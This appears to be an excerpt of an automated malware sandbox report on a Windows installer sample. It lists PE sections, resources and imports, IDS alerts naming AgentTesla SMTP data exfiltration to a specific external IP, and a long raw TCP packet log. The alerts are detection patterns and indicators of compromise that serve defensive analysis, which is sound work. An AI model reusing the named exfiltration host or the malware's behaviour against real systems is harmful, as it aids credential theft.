.text | 0x1000 | 0x5bf4 | 0x5c00 | 92032f5e50e74fe0fe80a33ba4ca92db | False | 0.6700067934782609 | data | 6.478210757314278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x7000 | 0x11ce | 0x1200 | 5801d712ecba58aa87d1e7d1aa24f3aa | False | 0.4522569444444444 | OpenPGP Secret Key | 5.236122428806677 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x9000 | 0x1a7f8 | 0x400 | f2470ac8847791744aff280e7e2f5353 | False | 0.615234375 | data | 5.025395707292401 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x24000 | 0x13000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x37000 | 0x28500 | 0x28600 | 8fe3eeefdb70a69775e0275630c876e7 | False | 0.33500024187306504 | data | 5.364335686193679 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x37358 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.27695788477463623 |
RT_ICON | 0x47b80 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.34693609417700233 |
RT_ICON | 0x51028 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.38391866913123845 |
RT_ICON | 0x564b0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.3682687765706188 |
RT_ICON | 0x5a6d8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.4352697095435685 |
RT_ICON | 0x5cc80 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4899155722326454 |
RT_ICON | 0x5dd28 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.601639344262295 |
RT_ICON | 0x5e6b0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6870567375886525 |
RT_DIALOG | 0x5eb18 | 0x140 | data | English | United States | 0.46875 |
RT_DIALOG | 0x5ec58 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0x5ed78 | 0xc4 | data | English | United States | 0.5918367346938775 |
RT_DIALOG | 0x5ee40 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0x5eea0 | 0x76 | data | English | United States | 0.7542372881355932 |
RT_VERSION | 0x5ef18 | 0x2e0 | data | English | United States | 0.48777173913043476 |
RT_MANIFEST | 0x5f1f8 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984 |
DLL | Import |
---|---|
KERNEL32.dll | GetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, CloseHandle, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, GetTempPathA, GetWindowsDirectoryA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary |
USER32.dll | CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA |
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA |
ADVAPI32.dll | RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA |
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize |
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-05T16:09:44.203457+0100 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.9 | 49933 | 208.91.199.223 | 587 | TCP |
2024-11-05T16:09:44.203457+0100 | 2840032 | ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 1 | 192.168.2.9 | 49933 | 208.91.199.223 | 587 | TCP |
2024-11-05T16:10:05.747802+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.9 | 49795 | TCP |
2024-11-05T16:10:30.808031+0100 | 2855245 | ETPRO MALWARE Agent Tesla Exfil via SMTP | 1 | 192.168.2.9 | 49933 | 208.91.199.223 | 587 | TCP |
2024-11-05T16:10:30.808031+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.9 | 49933 | 208.91.199.223 | 587 | TCP |
2024-11-05T16:10:43.237145+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.9 | 49977 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 5, 2024 16:10:20.382661104 CET | 49879 | 443 | 192.168.2.9 | 216.58.206.46 |
Nov 5, 2024 16:10:20.382707119 CET | 443 | 49879 | 216.58.206.46 | 192.168.2.9 |
Nov 5, 2024 16:10:20.382778883 CET | 49879 | 443 | 192.168.2.9 | 216.58.206.46 |
Nov 5, 2024 16:10:20.397202969 CET | 49879 | 443 | 192.168.2.9 | 216.58.206.46 |
Nov 5, 2024 16:10:20.397213936 CET | 443 | 49879 | 216.58.206.46 | 192.168.2.9 |
Nov 5, 2024 16:10:21.265965939 CET | 443 | 49879 | 216.58.206.46 | 192.168.2.9 |
Nov 5, 2024 16:10:21.266052008 CET | 49879 | 443 | 192.168.2.9 | 216.58.206.46 |
Nov 5, 2024 16:10:21.266665936 CET | 443 | 49879 | 216.58.206.46 | 192.168.2.9 |
Nov 5, 2024 16:10:21.266720057 CET | 49879 | 443 | 192.168.2.9 | 216.58.206.46 |
Nov 5, 2024 16:10:21.349963903 CET | 49879 | 443 | 192.168.2.9 | 216.58.206.46 |
Nov 5, 2024 16:10:21.349981070 CET | 443 | 49879 | 216.58.206.46 | 192.168.2.9 |
Nov 5, 2024 16:10:21.350270033 CET | 443 | 49879 | 216.58.206.46 | 192.168.2.9 |
Nov 5, 2024 16:10:21.350331068 CET | 49879 | 443 | 192.168.2.9 | 216.58.206.46 |
Nov 5, 2024 16:10:21.353750944 CET | 49879 | 443 | 192.168.2.9 | 216.58.206.46 |
Nov 5, 2024 16:10:21.399327993 CET | 443 | 49879 | 216.58.206.46 | 192.168.2.9 |
Nov 5, 2024 16:10:21.721776009 CET | 443 | 49879 | 216.58.206.46 | 192.168.2.9 |
Nov 5, 2024 16:10:21.721838951 CET | 49879 | 443 | 192.168.2.9 | 216.58.206.46 |
Nov 5, 2024 16:10:21.721848011 CET | 443 | 49879 | 216.58.206.46 | 192.168.2.9 |
Nov 5, 2024 16:10:21.722063065 CET | 49879 | 443 | 192.168.2.9 | 216.58.206.46 |
Nov 5, 2024 16:10:21.722234011 CET | 49879 | 443 | 192.168.2.9 | 216.58.206.46 |
Nov 5, 2024 16:10:21.722265005 CET | 443 | 49879 | 216.58.206.46 | 192.168.2.9 |
Nov 5, 2024 16:10:21.722311974 CET | 49879 | 443 | 192.168.2.9 | 216.58.206.46 |
Nov 5, 2024 16:10:21.745728970 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:21.745743036 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:21.745882988 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:21.746212006 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:21.746222019 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:22.614394903 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:22.614533901 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:22.618558884 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:22.618568897 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:22.618796110 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:22.622946978 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:22.623023033 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:22.667334080 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.100903988 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.101070881 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.110292912 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.110431910 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.216139078 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.216403961 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.216411114 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.216496944 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.216512918 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.216516972 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.216599941 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.233206034 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.233450890 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.233454943 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.233505964 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.238773108 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.238878965 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.238883018 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.238924980 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.247697115 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.247781992 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.247785091 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.247847080 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.257287979 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.257369995 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.257374048 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.257422924 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.266345978 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.266417980 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.266423941 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.266460896 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.279143095 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.279351950 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.279355049 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.279397964 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.285481930 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.285546064 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.285550117 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.285592079 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.295301914 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.295367956 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.295414925 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.295455933 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.331404924 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.331463099 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.331535101 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.331577063 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.331578016 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.331592083 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.331636906 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.331888914 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.331945896 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.331947088 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.331954956 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.331986904 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.332041979 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.332078934 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.348419905 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.348479033 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.348481894 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.348520994 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.365533113 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.365596056 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.365603924 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.365669012 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.368935108 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.369004965 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.369097948 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.369146109 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.374835968 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.374901056 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.374905109 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.374973059 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.381409883 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.381452084 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.381489038 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.381491899 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.381525040 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.381588936 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.387998104 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.388068914 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.388072014 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.388114929 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.393985987 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.394037008 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.394150019 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.394186020 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.400482893 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.400548935 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.400552988 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.400609970 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.407973051 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.408025980 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.408029079 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.408066034 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.412633896 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.412684917 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.412688017 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.412769079 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.418864965 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.418927908 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.418931007 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.418968916 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.425048113 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.425108910 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.425172091 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.425261974 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.431097031 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.431201935 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.431205988 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.431246996 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.437609911 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.437670946 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.437674999 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.437711000 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.444600105 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.444664001 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.445223093 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.445267916 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.449966908 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.450011015 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.450014114 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.450052023 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.456046104 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.456095934 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.456099033 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.456178904 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.462450027 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.462515116 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.462517977 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.462559938 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.468138933 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.468194008 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.468199015 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.468245029 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.475644112 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.475692987 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.475697041 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.475743055 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.482073069 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.482135057 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.482139111 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.482177973 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.487332106 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.487394094 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.487505913 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.487546921 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.491663933 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.491714954 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.491719007 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.491766930 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.497227907 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.497298956 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.497302055 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.497339964 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.503062010 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.503134966 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.503139019 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.503175020 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.506645918 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.506758928 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.506762981 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.506804943 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.510315895 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.510358095 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.510360956 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.510399103 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.513763905 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.513860941 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.513864994 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.513907909 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.517622948 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.517669916 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.517673969 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
Nov 5, 2024 16:10:25.517713070 CET | 49889 | 443 | 192.168.2.9 | 142.250.185.193 |
Nov 5, 2024 16:10:25.520759106 CET | 443 | 49889 | 142.250.185.193 | 192.168.2.9 |
